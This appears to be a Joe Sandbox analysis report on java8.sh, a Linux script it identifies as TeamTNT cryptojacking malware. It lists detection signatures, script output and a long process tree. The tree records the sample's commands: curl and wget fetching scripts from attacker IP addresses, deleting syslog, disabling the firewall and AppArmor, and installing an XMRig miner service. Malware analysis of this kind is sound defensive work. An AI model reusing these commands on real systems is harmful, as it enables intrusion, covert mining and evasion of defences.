Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
java8.sh

Overview

General Information

Sample Name:java8.sh
Analysis ID:1942029
MD5:b71195987084c3db262bce164d6af6aa
SHA1:3cef141263cfc0746616849ab2783ef130236f90
SHA256:4f4fef3aa02d725b00793b75afcd2d75ecd554a9a23cb3e7d87969b3226f72b1
Infos:

Detection

TeamTNT
Score:80
Range:0 - 100
Whitelisted:false

Signatures

Yara detected TeamTNT
Sample tries to persist itself using System V runlevels
Found strings related to Crypto-Mining
Deletes all firewall rules
Stdout / stderr contain strings indicative of a mining client
Tries to detect Cloud Protection Platforms agents (likely to circumvent detection)
Executes the "iptables" command to insert, remove and/or manipulate rules
Found strings indicative of a multi-platform dropper
Terminates several processes with shell command 'killall'
Reads CPU information from /sys indicative of miner or evasive malware
Executes the "mkdir" command used to create folders
Executes the "grep" command used to find patterns in files or piped streams
Executes the "wget" command typically used for HTTP/S downloading
Reads system information from the proc file system
Uses the "uname" system call to query kernel version information (possible evasion)
Enumerates processes within the "proc" file system
Executes the "systemctl" command used for controlling the systemd system and service manager
Removes protection from files
Executes the "ps" command used to list the status of processes
Executes the "curl" command used to transfer data via the network (typically using HTTP/S)
Executes the "sysctl" command used to retrieve or modify kernel settings
Executes the "sudo" command used to execute a command as another user
Deletes log files
Sample contains strings that are potentially command strings
Creates hidden files and/or directories
Executes the "id" command, possibly to determine if the user is root or not
Executes the "iptables" command used for managing IP filtering and manipulation
Executes the "modprobe" command used for loading kernel modules
HTTP GET or POST without a user agent
Executes the "rm" command used to delete files or directories

Classification

Joe Sandbox Version:35.0.0 Citrine
Analysis ID:1942029
Start date and time: 21/07/202222:38:512022-07-21 22:38:51 +02:00
Joe Sandbox Product:Cloud
Overall analysis duration:0h 8m 55s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:java8.sh
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 88.0.1, Atril Document Viewer 1.24.0, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Detection:MAL
Classification:mal80.spre.troj.evad.mine.linSH@0/9@7/0
Command:bash "/tmp/java8.sh"
PID:7068
Exit Code:
Exit Code Info:
Killed:True
Standard Output:
not Crypto running
rr process not running
Firewall stopped and disabled on system startup
ali cloud monitor not running
WARNING: Generally it is not adviced to run this script under root
vm.nr_hugepages = 1
1GB pages successfully enabled
Mining in background will be performed using moneroocean_miner systemd service.
[*] Removing previous rr miner (if any)
[*] Looking for the latest version of Xmrig miner
[*] Downloading https://github.com/xmrig/xmrig/releases/download/v6.18.0/xmrig-6.18.0-linux-static-x64.tar.gz to /tmp/xmrig.tar.gz
Standard Error:/tmp/java8.sh: line 7: [: too many arguments
/tmp/java8.sh: line 12: [: too many arguments
/tmp/java8.sh: line 19: [: too many arguments
/tmp/java8.sh: line 26: [: too many arguments
/tmp/java8.sh: line 32: [: too many arguments
/tmp/java8.sh: line 39: [: too many arguments
/tmp/java8.sh: line 46: [: too many arguments
/tmp/java8.sh: line 53: [: too many arguments
/tmp/java8.sh: line 60: [: too many arguments
/tmp/java8.sh: line 67: [: too many arguments
/tmp/java8.sh: line 74: [: too many arguments
/tmp/java8.sh: line 102: cd1: command not found
sysctl: setting key "kernel.nmi_watchdog": Unknown error 524
sysctl: setting key "kernel.nmi_watchdog": Unknown error 524
/tmp/java8.sh: line 114: echo: write error: Unknown error 524
/tmp/java8.sh: line 147: setenforce: command not found
Synchronizing state of apparmor.service with SysV service script with /lib/systemd/systemd-sysv-install.
Executing: /lib/systemd/systemd-sysv-install disable apparmor
Removed /etc/systemd/system/sysinit.target.wants/apparmor.service.
Failed to stop aliyun.service.service: Unit aliyun.service.service not loaded.
Failed to disable unit: Unit file aliyun.service does not exist.
/tmp/java8.sh: line 172: /sys/devices/system/node/node0/hugepages/hugepages-1048576kB/nr_hugepages: No such file or directory
Failed to stop xmrig.service: Unit xmrig.service not loaded.
xmrig: no process found
#=#=#
##O#- #
##O=# #
#=#=-# #
-#O#- # #

0.0%
0.1%
0.1%
0.2%
0.2%
0.3%
0.3%
0.4%
0.4%
0.5%
0.5%
0.5%
0.6%
0.6%
0.7%
  • system is lnxubuntu20
  • bash (PID: 7068, Parent: 6999, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /usr/bin/bash /tmp/java8.sh
    • bash New Fork (PID: 7069, Parent: 7068)
    • curl (PID: 7069, Parent: 7068, MD5: add6bc2195e82c55985ccf49fd4048e6) Arguments: curl -fsSL http://128.199.240.129/php/rr/make-rr.sh
    • bash New Fork (PID: 7070, Parent: 7068)
    • bash (PID: 7070, Parent: 7068, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: bash
      • bash New Fork (PID: 7072, Parent: 7070)
      • curl (PID: 7072, Parent: 7070, MD5: add6bc2195e82c55985ccf49fd4048e6) Arguments: curl -sLO http://65.108.148.150/java8-py//make-rr.c
      • bash New Fork (PID: 7073, Parent: 7070)
      • wget (PID: 7073, Parent: 7070, MD5: 996940118df7bb2aaa718589d4e95c08) Arguments: wget --no-hsts -q http://65.108.148.150/java8-py//make-rr.c -O make-rr.c
    • bash New Fork (PID: 7074, Parent: 7068)
    • bash New Fork (PID: 7075, Parent: 7068)
    • bash (PID: 7075, Parent: 7068, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: bash
    • bash New Fork (PID: 7077, Parent: 7068)
    • mkdir (PID: 7077, Parent: 7068, MD5: 088c9d1df5a28ed16c726eca15964cb7) Arguments: mkdir /etc/.system/php -p
    • bash New Fork (PID: 7078, Parent: 7068)
    • rm (PID: 7078, Parent: 7068, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /var/log/syslog
    • bash New Fork (PID: 7079, Parent: 7068)
    • chattr (PID: 7079, Parent: 7068, MD5: fae2c2deaeca3bbf906fb8034304ad32) Arguments: chattr -iua /tmp/
    • bash New Fork (PID: 7080, Parent: 7068)
    • chattr (PID: 7080, Parent: 7068, MD5: fae2c2deaeca3bbf906fb8034304ad32) Arguments: chattr -iua /var/tmp/
    • bash New Fork (PID: 7081, Parent: 7068)
    • ufw (PID: 7081, Parent: 7068, MD5: cd500b8d3d61717085e533cdfc431edf) Arguments: ufw disable
      • ufw New Fork (PID: 7082, Parent: 7081)
      • iptables (PID: 7082, Parent: 7081, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: /usr/sbin/iptables -V
      • ufw New Fork (PID: 7083, Parent: 7081)
      • ufw-init (PID: 7083, Parent: 7081, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /lib/ufw/ufw-init force-stop
        • ufw-init New Fork (PID: 7084, Parent: 7083)
        • ip6tables (PID: 7084, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -L INPUT -n
          • modprobe (PID: 7086, Parent: 7084, MD5: 0b44462b1a40df8039d6d61cfff7ea84) Arguments: /sbin/modprobe ip6_tables
        • ufw-init New Fork (PID: 7088, Parent: 7083)
        • iptables (PID: 7088, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-logging-deny
        • ufw-init New Fork (PID: 7092, Parent: 7083)
        • iptables (PID: 7092, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-logging-allow
        • ufw-init New Fork (PID: 7093, Parent: 7083)
        • iptables (PID: 7093, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-not-local
        • ufw-init New Fork (PID: 7094, Parent: 7083)
        • iptables (PID: 7094, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-user-logging-input
        • ufw-init New Fork (PID: 7095, Parent: 7083)
        • iptables (PID: 7095, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-user-limit-accept
        • ufw-init New Fork (PID: 7096, Parent: 7083)
        • iptables (PID: 7096, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-user-limit
        • ufw-init New Fork (PID: 7097, Parent: 7083)
        • iptables (PID: 7097, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-skip-to-policy-input
        • ufw-init New Fork (PID: 7098, Parent: 7083)
        • iptables (PID: 7098, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-reject-input
        • ufw-init New Fork (PID: 7099, Parent: 7083)
        • iptables (PID: 7099, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-after-logging-input
        • ufw-init New Fork (PID: 7100, Parent: 7083)
        • iptables (PID: 7100, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-after-input
        • ufw-init New Fork (PID: 7101, Parent: 7083)
        • iptables (PID: 7101, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-user-input
        • ufw-init New Fork (PID: 7102, Parent: 7083)
        • iptables (PID: 7102, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-before-input
        • ufw-init New Fork (PID: 7103, Parent: 7083)
        • iptables (PID: 7103, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-before-logging-input
        • ufw-init New Fork (PID: 7104, Parent: 7083)
        • iptables (PID: 7104, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-skip-to-policy-forward
        • ufw-init New Fork (PID: 7105, Parent: 7083)
        • iptables (PID: 7105, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-reject-forward
        • ufw-init New Fork (PID: 7106, Parent: 7083)
        • iptables (PID: 7106, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-after-logging-forward
        • ufw-init New Fork (PID: 7107, Parent: 7083)
        • iptables (PID: 7107, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-after-forward
        • ufw-init New Fork (PID: 7108, Parent: 7083)
        • iptables (PID: 7108, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-user-logging-forward
        • ufw-init New Fork (PID: 7109, Parent: 7083)
        • iptables (PID: 7109, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-user-forward
        • ufw-init New Fork (PID: 7110, Parent: 7083)
        • iptables (PID: 7110, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-before-forward
        • ufw-init New Fork (PID: 7111, Parent: 7083)
        • iptables (PID: 7111, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-before-logging-forward
        • ufw-init New Fork (PID: 7112, Parent: 7083)
        • iptables (PID: 7112, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-track-forward
        • ufw-init New Fork (PID: 7113, Parent: 7083)
        • iptables (PID: 7113, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-track-output
        • ufw-init New Fork (PID: 7114, Parent: 7083)
        • iptables (PID: 7114, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-track-input
        • ufw-init New Fork (PID: 7115, Parent: 7083)
        • iptables (PID: 7115, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-skip-to-policy-output
        • ufw-init New Fork (PID: 7116, Parent: 7083)
        • iptables (PID: 7116, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-reject-output
        • ufw-init New Fork (PID: 7117, Parent: 7083)
        • iptables (PID: 7117, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-after-logging-output
        • ufw-init New Fork (PID: 7118, Parent: 7083)
        • iptables (PID: 7118, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-after-output
        • ufw-init New Fork (PID: 7119, Parent: 7083)
        • iptables (PID: 7119, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-user-logging-output
        • ufw-init New Fork (PID: 7120, Parent: 7083)
        • iptables (PID: 7120, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-user-output
        • ufw-init New Fork (PID: 7121, Parent: 7083)
        • iptables (PID: 7121, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-before-output
        • ufw-init New Fork (PID: 7122, Parent: 7083)
        • iptables (PID: 7122, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-before-logging-output
        • ufw-init New Fork (PID: 7123, Parent: 7083)
        • iptables (PID: 7123, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-logging-deny
        • ufw-init New Fork (PID: 7124, Parent: 7083)
        • iptables (PID: 7124, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-logging-allow
        • ufw-init New Fork (PID: 7125, Parent: 7083)
        • iptables (PID: 7125, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-not-local
        • ufw-init New Fork (PID: 7126, Parent: 7083)
        • iptables (PID: 7126, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-user-logging-input
        • ufw-init New Fork (PID: 7127, Parent: 7083)
        • iptables (PID: 7127, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-user-limit-accept
        • ufw-init New Fork (PID: 7128, Parent: 7083)
        • iptables (PID: 7128, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-user-limit
        • ufw-init New Fork (PID: 7129, Parent: 7083)
        • iptables (PID: 7129, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-skip-to-policy-input
        • ufw-init New Fork (PID: 7130, Parent: 7083)
        • iptables (PID: 7130, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-reject-input
        • ufw-init New Fork (PID: 7131, Parent: 7083)
        • iptables (PID: 7131, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-after-logging-input
        • ufw-init New Fork (PID: 7132, Parent: 7083)
        • iptables (PID: 7132, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-after-input
        • ufw-init New Fork (PID: 7133, Parent: 7083)
        • iptables (PID: 7133, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-user-input
        • ufw-init New Fork (PID: 7134, Parent: 7083)
        • iptables (PID: 7134, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-before-input
        • ufw-init New Fork (PID: 7135, Parent: 7083)
        • iptables (PID: 7135, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-before-logging-input
        • ufw-init New Fork (PID: 7136, Parent: 7083)
        • iptables (PID: 7136, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-skip-to-policy-forward
        • ufw-init New Fork (PID: 7137, Parent: 7083)
        • iptables (PID: 7137, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-reject-forward
        • ufw-init New Fork (PID: 7138, Parent: 7083)
        • iptables (PID: 7138, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-after-logging-forward
        • ufw-init New Fork (PID: 7139, Parent: 7083)
        • iptables (PID: 7139, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-after-forward
        • ufw-init New Fork (PID: 7140, Parent: 7083)
        • iptables (PID: 7140, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-user-logging-forward
        • ufw-init New Fork (PID: 7141, Parent: 7083)
        • iptables (PID: 7141, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-user-forward
        • ufw-init New Fork (PID: 7142, Parent: 7083)
        • iptables (PID: 7142, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-before-forward
        • ufw-init New Fork (PID: 7143, Parent: 7083)
        • iptables (PID: 7143, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-before-logging-forward
        • ufw-init New Fork (PID: 7144, Parent: 7083)
        • iptables (PID: 7144, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-track-forward
        • ufw-init New Fork (PID: 7145, Parent: 7083)
        • iptables (PID: 7145, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-track-output
        • ufw-init New Fork (PID: 7146, Parent: 7083)
        • iptables (PID: 7146, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-track-input
        • ufw-init New Fork (PID: 7147, Parent: 7083)
        • iptables (PID: 7147, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-skip-to-policy-output
        • ufw-init New Fork (PID: 7148, Parent: 7083)
        • iptables (PID: 7148, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-reject-output
        • ufw-init New Fork (PID: 7149, Parent: 7083)
        • iptables (PID: 7149, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-after-logging-output
        • ufw-init New Fork (PID: 7150, Parent: 7083)
        • iptables (PID: 7150, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-after-output
        • ufw-init New Fork (PID: 7151, Parent: 7083)
        • iptables (PID: 7151, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-user-logging-output
        • ufw-init New Fork (PID: 7152, Parent: 7083)
        • iptables (PID: 7152, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-user-output
        • ufw-init New Fork (PID: 7153, Parent: 7083)
        • iptables (PID: 7153, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-before-output
        • ufw-init New Fork (PID: 7154, Parent: 7083)
        • iptables (PID: 7154, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-before-logging-output
        • ufw-init New Fork (PID: 7155, Parent: 7083)
        • iptables (PID: 7155, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -X ufw-logging-deny
        • ufw-init New Fork (PID: 7156, Parent: 7083)
        • iptables (PID: 7156, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -X ufw-logging-allow
        • ufw-init New Fork (PID: 7157, Parent: 7083)
        • iptables (PID: 7157, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -X ufw-not-local
        • ufw-init New Fork (PID: 7158, Parent: 7083)
        • iptables (PID: 7158, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -X ufw-user-logging-input
        • ufw-init New Fork (PID: 7159, Parent: 7083)
        • iptables (PID: 7159, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -X ufw-user-logging-output
        • ufw-init New Fork (PID: 7160, Parent: 7083)
        • iptables (PID: 7160, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -X ufw-user-logging-forward
        • ufw-init New Fork (PID: 7161, Parent: 7083)
        • iptables (PID: 7161, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -X ufw-user-limit-accept
        • ufw-init New Fork (PID: 7162, Parent: 7083)
        • iptables (PID: 7162, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -X ufw-user-limit
        • ufw-init New Fork (PID: 7163, Parent: 7083)
        • iptables (PID: 7163, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -X ufw-user-input
        • ufw-init New Fork (PID: 7164, Parent: 7083)
        • iptables (PID: 7164, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -X ufw-user-forward
        • ufw-init New Fork (PID: 7165, Parent: 7083)
        • iptables (PID: 7165, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -X ufw-user-output
        • ufw-init New Fork (PID: 7166, Parent: 7083)
        • iptables (PID: 7166, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -X ufw-skip-to-policy-input
        • ufw-init New Fork (PID: 7167, Parent: 7083)
        • iptables (PID: 7167, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -X ufw-skip-to-policy-output
        • ufw-init New Fork (PID: 7168, Parent: 7083)
        • iptables (PID: 7168, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -X ufw-skip-to-policy-forward
        • ufw-init New Fork (PID: 7169, Parent: 7083)
        • iptables (PID: 7169, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -P INPUT ACCEPT
        • ufw-init New Fork (PID: 7170, Parent: 7083)
        • iptables (PID: 7170, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -P OUTPUT ACCEPT
        • ufw-init New Fork (PID: 7171, Parent: 7083)
        • iptables (PID: 7171, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -P FORWARD ACCEPT
        • ufw-init New Fork (PID: 7172, Parent: 7083)
        • ip6tables (PID: 7172, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-logging-deny
        • ufw-init New Fork (PID: 7173, Parent: 7083)
        • ip6tables (PID: 7173, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-logging-allow
        • ufw-init New Fork (PID: 7174, Parent: 7083)
        • ip6tables (PID: 7174, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-not-local
        • ufw-init New Fork (PID: 7175, Parent: 7083)
        • ip6tables (PID: 7175, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-user-logging-input
        • ufw-init New Fork (PID: 7176, Parent: 7083)
        • ip6tables (PID: 7176, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-user-limit-accept
        • ufw-init New Fork (PID: 7177, Parent: 7083)
        • ip6tables (PID: 7177, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-user-limit
        • ufw-init New Fork (PID: 7178, Parent: 7083)
        • ip6tables (PID: 7178, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-skip-to-policy-input
        • ufw-init New Fork (PID: 7179, Parent: 7083)
        • ip6tables (PID: 7179, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-reject-input
        • ufw-init New Fork (PID: 7180, Parent: 7083)
        • ip6tables (PID: 7180, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-after-logging-input
        • ufw-init New Fork (PID: 7181, Parent: 7083)
        • ip6tables (PID: 7181, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-after-input
        • ufw-init New Fork (PID: 7182, Parent: 7083)
        • ip6tables (PID: 7182, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-user-input
        • ufw-init New Fork (PID: 7183, Parent: 7083)
        • ip6tables (PID: 7183, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-before-input
        • ufw-init New Fork (PID: 7184, Parent: 7083)
        • ip6tables (PID: 7184, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-before-logging-input
        • ufw-init New Fork (PID: 7185, Parent: 7083)
        • ip6tables (PID: 7185, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-skip-to-policy-forward
        • ufw-init New Fork (PID: 7186, Parent: 7083)
        • ip6tables (PID: 7186, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-reject-forward
        • ufw-init New Fork (PID: 7187, Parent: 7083)
        • ip6tables (PID: 7187, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-after-logging-forward
        • ufw-init New Fork (PID: 7188, Parent: 7083)
        • ip6tables (PID: 7188, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-after-forward
        • ufw-init New Fork (PID: 7189, Parent: 7083)
        • ip6tables (PID: 7189, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-user-logging-forward
        • ufw-init New Fork (PID: 7190, Parent: 7083)
        • ip6tables (PID: 7190, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-user-forward
        • ufw-init New Fork (PID: 7191, Parent: 7083)
        • ip6tables (PID: 7191, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-before-forward
        • ufw-init New Fork (PID: 7192, Parent: 7083)
        • ip6tables (PID: 7192, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-before-logging-forward
        • ufw-init New Fork (PID: 7193, Parent: 7083)
        • ip6tables (PID: 7193, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-track-forward
        • ufw-init New Fork (PID: 7194, Parent: 7083)
        • ip6tables (PID: 7194, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-track-output
        • ufw-init New Fork (PID: 7195, Parent: 7083)
        • ip6tables (PID: 7195, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-track-input
        • ufw-init New Fork (PID: 7196, Parent: 7083)
        • ip6tables (PID: 7196, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-skip-to-policy-output
        • ufw-init New Fork (PID: 7197, Parent: 7083)
        • ip6tables (PID: 7197, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-reject-output
        • ufw-init New Fork (PID: 7198, Parent: 7083)
        • ip6tables (PID: 7198, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-after-logging-output
        • ufw-init New Fork (PID: 7199, Parent: 7083)
        • ip6tables (PID: 7199, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-after-output
        • ufw-init New Fork (PID: 7200, Parent: 7083)
        • ip6tables (PID: 7200, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-user-logging-output
        • ufw-init New Fork (PID: 7201, Parent: 7083)
        • ip6tables (PID: 7201, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-user-output
        • ufw-init New Fork (PID: 7202, Parent: 7083)
        • ip6tables (PID: 7202, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-before-output
        • ufw-init New Fork (PID: 7203, Parent: 7083)
        • ip6tables (PID: 7203, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-before-logging-output
        • ufw-init New Fork (PID: 7204, Parent: 7083)
        • ip6tables (PID: 7204, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-logging-deny
        • ufw-init New Fork (PID: 7205, Parent: 7083)
        • ip6tables (PID: 7205, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-logging-allow
        • ufw-init New Fork (PID: 7206, Parent: 7083)
        • ip6tables (PID: 7206, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-not-local
        • ufw-init New Fork (PID: 7207, Parent: 7083)
